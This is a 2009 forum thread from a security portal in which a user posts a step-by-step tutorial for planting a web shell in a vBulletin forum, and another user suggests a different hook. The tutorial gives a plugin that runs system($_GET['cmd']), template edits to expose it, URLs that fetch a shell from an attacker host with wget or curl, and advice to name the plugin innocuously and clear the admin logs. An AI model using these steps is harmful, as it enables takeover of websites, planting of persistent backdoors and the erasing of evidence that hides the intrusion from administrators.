 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 76
 Members: 0
 Total: 76
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Uploading shells in vbulletin |
|
 Posted: Mon Dec 07, 2009 9:46 pm |
 |
|
| saiflol |
| Beginner |
 |
|
| Joined: Dec 07, 2009 |
| Posts: 2 |
|
|
|
 |
|
 |
|
A tuto for uploading shells in vbulletin
Requirements:
- Admin Access
- A brain
Tutorial
1. Log into the admin cp.
2. Under 'Plugins & Products' select Add New Plugin
3. Set the settings as follows:
Product : vBulletin
Hook Location : global_start
Title : (Anything non fishy.. I use 'DEFAULT PLUG')
Execution Order : 5
Plugin PHP Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean();
Plugin is Active : Yes
--------------------
So in the end, it should look like this:
http://img291.imageshack.us/img291/9845/screenxd3.png
4. After the plugin is added, go to under 'Styles & Templates', select 'Style Manager'
5. Under whatever the default style is, in the drop down menu select Edit Templates.
6. Scroll to ForumHome Templates and expand it. Click on [CUSTOMIZE] next to FORUMHOME.
7. Look for
$header
somewhere near the top. Replace it with:
$header
$execcode
8. Go to the main forum page... You should see it saying, "Cannot execute blank command" somewhere on the page. If you see "System() has been disabled" or anything like that, then it's a shitty server, forget it.
9. Now go to the forum and add the following after index.php
?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php
So it would look like
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.evilshell.com/shell.txt;mv shell.txt shell.php
What this does, is downloads shell.txt, and renames it to shell.php.
Now, the shell should be located in shell.php in the forums directory... If not, then wget is disabled on this server, you can try some alternate methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.evilshell.com/shell.txt > shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.evilshell.com/shell.txt shell.php
After you have your real shell on there, remove the plugin, and remove the $execcode from the FORUMHOME section of the template.
Dont forget to clear your admin logs |
|
|
|
|
|
|
|
|
| Posted: Tue Dec 08, 2009 5:44 pm |
|
|
| capt |
| Advanced user |
 |
|
| Joined: Nov 04, 2008 |
| Posts: 232 |
|
|
|
|
|
|
|
| nice but you could just use ajax_complete for the hook and use simple php code to get it to do the same thing. In this one you have to edit template and sometimes in the php.ini under disabled_function kills system() commands. |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
